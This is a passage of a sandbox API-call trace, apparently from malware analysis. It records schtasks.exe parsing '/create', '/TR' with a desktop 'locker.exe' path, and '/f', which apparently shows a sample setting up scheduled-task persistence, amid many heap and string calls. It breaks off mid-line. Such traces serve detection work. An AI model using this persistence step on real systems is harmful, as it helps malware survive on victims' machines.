_vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|create|") returned 8 [0113.340] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TR|") returned 4 [0113.340] lstrlenW (lpString="|create|") returned 8 [0113.340] lstrlenW (lpString="|TR|") returned 4 [0113.340] StrStrIW (lpFirst="|create|", lpSrch="|TR|") returned 0x0 [0113.340] RtlRestoreLastWin32Error () returned 0x3163000 [0113.340] lstrlenW (lpString="delete") returned 6 [0113.340] lstrlenW (lpString="delete") returned 6 [0113.340] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.340] lstrlenW (lpString="TR") returned 2 [0113.340] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.340] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|delete|") returned 8 [0113.341] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TR|") returned 4 [0113.341] lstrlenW (lpString="|delete|") returned 8 [0113.341] lstrlenW (lpString="|TR|") returned 4 [0113.341] StrStrIW (lpFirst="|delete|", lpSrch="|TR|") returned 0x0 [0113.341] RtlRestoreLastWin32Error () returned 0x3163000 [0113.341] lstrlenW (lpString="query") returned 5 [0113.341] lstrlenW (lpString="query") returned 5 [0113.341] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.341] lstrlenW (lpString="TR") returned 2 [0113.341] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.341] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x8, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|query|") returned 7 [0113.341] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TR|") returned 4 [0113.341] lstrlenW (lpString="|query|") returned 7 [0113.341] lstrlenW (lpString="|TR|") returned 4 [0113.341] StrStrIW (lpFirst="|query|", lpSrch="|TR|") returned 0x0 [0113.341] RtlRestoreLastWin32Error () returned 0x3163000 [0113.341] lstrlenW (lpString="change") returned 6 [0113.341] lstrlenW (lpString="change") returned 6 [0113.341] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.341] lstrlenW (lpString="TR") returned 2 [0113.341] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.341] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|change|") returned 8 [0113.341] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TR|") returned 4 [0113.341] lstrlenW (lpString="|change|") returned 8 [0113.341] lstrlenW (lpString="|TR|") returned 4 [0113.341] StrStrIW (lpFirst="|change|", lpSrch="|TR|") returned 0x0 [0113.341] RtlRestoreLastWin32Error () returned 0x3163000 [0113.341] lstrlenW (lpString="run") returned 3 [0113.341] lstrlenW (lpString="run") returned 3 [0113.341] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.342] lstrlenW (lpString="TR") returned 2 [0113.342] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.342] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x6, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|run|") returned 5 [0113.342] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TR|") returned 4 [0113.342] lstrlenW (lpString="|run|") returned 5 [0113.342] lstrlenW (lpString="|TR|") returned 4 [0113.342] StrStrIW (lpFirst="|run|", lpSrch="|TR|") returned 0x0 [0113.342] RtlRestoreLastWin32Error () returned 0x3163000 [0113.342] lstrlenW (lpString="end") returned 3 [0113.342] lstrlenW (lpString="end") returned 3 [0113.342] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.342] lstrlenW (lpString="TR") returned 2 [0113.342] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.342] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x6, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|end|") returned 5 [0113.342] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TR|") returned 4 [0113.342] lstrlenW (lpString="|end|") returned 5 [0113.342] lstrlenW (lpString="|TR|") returned 4 [0113.342] StrStrIW (lpFirst="|end|", lpSrch="|TR|") returned 0x0 [0113.342] RtlRestoreLastWin32Error () returned 0x3163000 [0113.342] lstrlenW (lpString="showsid") returned 7 [0113.342] lstrlenW (lpString="showsid") returned 7 [0113.342] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.342] lstrlenW (lpString="TR") returned 2 [0113.342] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.342] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0xa, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|showsid|") returned 9 [0113.342] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TR|") returned 4 [0113.342] lstrlenW (lpString="|showsid|") returned 9 [0113.342] lstrlenW (lpString="|TR|") returned 4 [0113.342] StrStrIW (lpFirst="|showsid|", lpSrch="|TR|") returned 0x0 [0113.343] RtlRestoreLastWin32Error () returned 0x3163000 [0113.343] RtlRestoreLastWin32Error () returned 0x3163000 [0113.343] RtlRestoreLastWin32Error () returned 0x3163000 [0113.343] lstrlenW (lpString="/TR") returned 3 [0113.343] StrChrIW (lpStart="/TR", wMatch=0x3a) returned 0x0 [0113.343] RtlRestoreLastWin32Error () returned 0x3163000 [0113.343] RtlRestoreLastWin32Error () returned 0x3163000 [0113.343] lstrlenW (lpString="/TR") returned 3 [0113.343] GetProcessHeap () returned 0x3300000 [0113.343] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x8) returned 0x330bc18 [0113.343] GetProcessHeap () returned 0x3300000 [0113.343] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x3310298 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.344] lstrlenW (lpString="-/") returned 2 [0113.344] StrChrIW (lpStart="-/", wMatch=0x32f0043) returned 0x0 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.344] StrChrIW (lpStart="C:\\Users\\FD1HVy\\Desktop\\locker.exe", wMatch=0x3a) returned=":\\Users\\FD1HVy\\Desktop\\locker.exe" [0113.344] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.344] GetProcessHeap () returned 0x3300000 [0113.344] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x330fcd8 [0113.344] _memicmp (_Buf1=0x330fcd8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.344] GetProcessHeap () returned 0x3300000 [0113.344] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xc) returned 0x330fb70 [0113.344] GetProcessHeap () returned 0x3300000 [0113.344] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x330fa20 [0113.344] _memicmp (_Buf1=0x330fa20, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.344] GetProcessHeap () returned 0x3300000 [0113.344] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x4a) returned 0x3304498 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] lstrlenW (lpString="C") returned 1 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.344] GetProcessHeap () returned 0x3300000 [0113.344] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x46) returned 0x3304708 [0113.344] GetProcessHeap () returned 0x3300000 [0113.344] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x3310058 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.344] RtlRestoreLastWin32Error () returned 0x3163000 [0113.345] lstrlenW (lpString="/f") returned 2 [0113.345] lstrlenW (lpString="-/") returned 2 [0113.345] StrChrIW (lpStart="-/", wMatch=0x32f002f) returned="/" [0113.345] lstrlenW (lpString="?") returned 1 [0113.345] lstrlenW (lpString="?") returned 1 [0113.345] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.345] lstrlenW (lpString="f") returned 1 [0113.345] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.345] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|?|") returned 3 [0113.345] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|f|") returned 3 [0113.345] lstrlenW (lpString="|?|") returned 3 [0113.345] lstrlenW (lpString="|f|") returned 3 [0113.345] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0 [0113.345] RtlRestoreLastWin32Error () returned 0x3163000 [0113.345] lstrlenW (lpString="create") returned 6 [0113.345] lstrlenW (lpString="create") returned 6 [0113.345] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.361] lstrlenW (lpString="f") returned 1 [0113.361] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.361] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|create|") returned 8 [0113.361] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|f|") returned 3 [0113.361] lstrlenW (lpString="|create|") returned 8 [0113.361] lstrlenW (lpString="|f|") returned 3 [0113.361] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0 [0113.361] RtlRestoreLastWin32Error () returned 0x3163000 [0113.361] lstrlenW (lpString="delete") returned 6 [0113.361] lstrlenW (lpString="delete") returned 6 [0113.361] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.361] lstrlenW (lpString="f") returned 1 [0113.361] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.361] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|delete|") returned 8 [0113.362] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|f|") returned 3 [0113.362] lstrlenW (lpString="|delete|") returned 8 [0113.362] lstrlenW (lpString="|f|") returned 3 [0113.362] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0 [0113.362] RtlRestoreLastWin32Error () returned 0x3163000 [0113.362] lstrlenW (lpString="query") returned 5 [0113.362] lstrlenW (lpString="query") returned 5 [0113.362] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.362] lstrlenW (lpString="f") returned 1 [0113.362] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.362] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x8, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|query|") returned 7 [0113.362] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|f|") returned 3 [0113.362] lstrlenW (lpString="|query|") returned 7 [0113.362] lstrlenW (lpString="|f|") returned 3 [0113.362] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0 [0113.362] RtlRestoreLastWin32Error () returned 0x3163000 [0113.362] lstrlenW (lpString="change") returned 6 [0113.362] lstrlenW (lpString="change") returned 6 [0113.362] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.362] lstrlenW (lpString="f") returned 1 [0113.362] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.362] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|change|") returned 8 [0113.362] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|f|") returned 3 [0113.362] lstrlenW (lpString="|change|") returned 8 [0113.362] lstrlenW (lpString="|f|") returned 3 [0113.362] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0 [0113.362] RtlRestoreLastWin32Error () returned 0x3163000 [0113.362] lstrlenW (lpString="run") returned 3 [0113.362] lstrlenW (lpString="run") returned 3 [0113.362] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.363] lstrlenW (lpString="f") returned 1 [0113.363] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.363] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x6, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|run|") returned 5 [0113.363] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|f|") returned 3 [0113.363] lstrlenW (lpString="|run|") returned 5 [0113.363] lstrlenW (lpString="|f|") returned 3 [0113.363] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0 [0113.363] RtlRestoreLastWin32Error () returned 0x3163000 [0113.363] lstrlenW (lpString="end") returned 3 [0113.363] lstrlenW (lpString="end") returned 3 [0113.363] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.363] lstrlenW (lpString="f") returned 1 [0113.363] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.363] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x6, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|end|") returned 5 [0113.363] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|f|") returned 3 [0113.363] lstrlenW (lpString="|end|") returned 5 [0113.363] lstrlenW (lpString="|f|") returned 3 [0113.363] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0 [0113.363] RtlRestoreLastWin32Error () returned 0x3163000 [0113.363] lstrlenW (lpString="showsid") returned 7 [0113.363] lstrlenW (lpString="showsid") returned 7 [0113.363] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.363] lstrlenW (lpString="f") returned 1 [0113.363] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.363] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0xa, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|showsid|") returned 9 [0113.363] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|f|") returned 3 [0113.363] lstrlenW (lpString="|showsid|") returned 9 [0113.363] lstrlenW (lpString="|f|") returned 3 [0113.363] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0 [0113.363] RtlRestoreLastWin32Error () returned 0x3163000 [0113.364] RtlRestoreLastWin32Error () returned 0x3163000 [0113.364] RtlRestoreLastWin32Error () returned 0x3163000 [0113.364] lstrlenW (lpString="/f") returned 2 [0113.364] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0 [0113.364] RtlRestoreLastWin32Error () returned 0x3163000 [0113.364] RtlRestoreLastWin32Error () returned 0x3163000 [0113.364] lstrlenW (lpString="/f") returned 2 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x6) returned 0x330bc08 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x33103f8 [0113.364] RtlRestoreLastWin32Error () returned 0x3163000 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330bb68) returned 1 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330bb68) returned 0x8 [0113.364] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330bb68) returned 1 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d1d0) returned 1 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d1d0) returned 0x14 [0113.364] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d1d0) returned 1 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fb58) returned 1 [0113.364] GetProcessHeap () returned 0x3300000 [0113.364] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fb58) returned 0xe [0113.364] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fb58) returned 1 [0113.364] GetProcessHeap () returned 0x3300000 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d010) returned 1 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d010) returned 0x14 [0113.365] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d010) returned 1 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330bb88) returned 1 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330bb88) returned 0x8 [0113.365] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330bb88) returned 1 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d1f0) returned 1 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d1f0) returned 0x14 [0113.365] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d1f0) returned 1 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x33046d8) returned 1 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x33046d8) returned 0x24 [0113.365] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x33046d8) returned 1 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d210) returned 1 [0113.365] GetProcessHeap () returned 0x3300000 [0113.365] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d210) returned 0x14 [0113.365] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d210) returned 1 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330bc18) returned 1 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330bc18) returned 0x8 [0113.366] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330bc18) returned 1 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3310298) returned 1 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3310298) returned 0x14 [0113.366] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3310298) returned 1 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3304708) returned 1 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3304708) returned 0x46 [0113.366] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3304708) returned 1 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3310058) returned 1 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3310058) returned 0x14 [0113.366] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3310058) returned 1 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330bc08) returned 1 [0113.366] GetProcessHeap () returned 0x3300000 [0113.366] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330bc08) returned 0x6 [0113.367] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330bc08) returned 1 [0113.367] GetProcessHeap () returned 0x3300000 [0113.367] GetProcessHeap () returned 0x3300000 [0113.367] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x33103f8) returned 1 [0113.367] GetProcessHeap () returned 0x3300000 [0113.367] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x33103f8) returned 0x14 [0113.367] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x33103f8) returned 1 [0113.367] GetProcessHeap () returned 0x3300000 [0113.367] GetProcessHeap () returned 0x3300000 [0113.367] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3307cc0) returned 1 [0113.367] GetProcessHeap () returned 0x3300000 [0113.367] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3307cc0) returned 0x10 [0113.367] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3307cc0) returned 1 [0113.367] RtlRestoreLastWin32Error () returned 0x3163000 [0113.368] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0113.368] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0113.368] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0113.368] RtlVerifyVersionInfo (VersionInfo=0xd2c9d0, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0113.368] RtlRestoreLastWin32Error () returned 0x3163000 [0113.368] lstrlenW (lpString="create") returned 6 [0113.368] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0113.368] RtlRestoreLastWin32Error () returned 0x3163000 [0113.368] RtlRestoreLastWin32Error () returned 0x3163000 [0113.368] lstrlenW (lpString="create") returned 6 [0113.368] GetProcessHeap () returned 0x3300000 [0113.368] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d1d0 [0113.368] GetProcessHeap () returned 0x3300000 [0113.368] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x330fab0 [0113.368] _memicmp (_Buf1=0x330fab0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.368] GetProcessHeap () returned 0x3300000 [0113.368] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x16) returned 0x330d1f0 [0113.368] RtlRestoreLastWin32Error () returned 0x3163000 [0113.368] _memicmp (_Buf1=0x3307de0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.368] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x330d230, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0113.368] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\WINDOWS\\SysWOW64\\schtasks.exe", lpdwHandle=0xd2cadc | out: lpdwHandle=0xd2cadc) returned 0x75c [0113.369] GetProcessHeap () returned 0x3300000 [0113.369] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x766) returned 0x330f138 [0113.369] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\WINDOWS\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x766, lpData=0x330f138 | out: lpData=0x330f138) returned 1 [0113.369] VerQueryValueW (in: pBlock=0x330f138, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xd2cae4, puLen=0xd2cae8 | out: lplpBuffer=0xd2cae4*=0x330f4e0, puLen=0xd2cae8) returned 1 [0113.369] _memicmp (_Buf1=0x3307de0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.369] _vsnwprintf (in: _Buffer=0x330d230, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xd2cac8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0113.369] VerQueryValueW (in: pBlock=0x330f138, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xd2caf4, puLen=0xd2caf0 | out: lplpBuffer=0xd2caf4*=0x330f310, puLen=0xd2caf0) returned 1 [0113.369] lstrlenW (lpString="schtasks.exe") returned 12 [0113.369] lstrlenW (lpString="schtasks.exe") returned 12 [0113.369] lstrlenW (lpString=".EXE") returned 4 [0113.369] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0113.369] lstrlenW (lpString="schtasks.exe") returned 12 [0113.369] lstrlenW (lpString=".EXE") returned 4 [0113.369] lstrlenW (lpString="schtasks") returned 8 [0113.369] lstrlenW (lpString="/create") returned 7 [0113.369] _memicmp (_Buf1=0x3307de0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.369] _vsnwprintf (in: _Buffer=0x330d230, _BufferCount=0x19, _Format="%s %s", _ArgList=0xd2cac8 | out: _Buffer="schtasks /create") returned 16 [0113.369] _memicmp (_Buf1=0x3307cd8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.369] GetProcessHeap () returned 0x3300000 [0113.370] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d210 [0113.370] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.370] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0113.370] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0113.370] GetProcessHeap () returned 0x3300000 [0113.370] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x30) returned 0x33046d8 [0113.370] _vsnwprintf (in: _Buffer=0x33004a0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xd2cacc | out: _Buffer="Type \"SCHTASKS 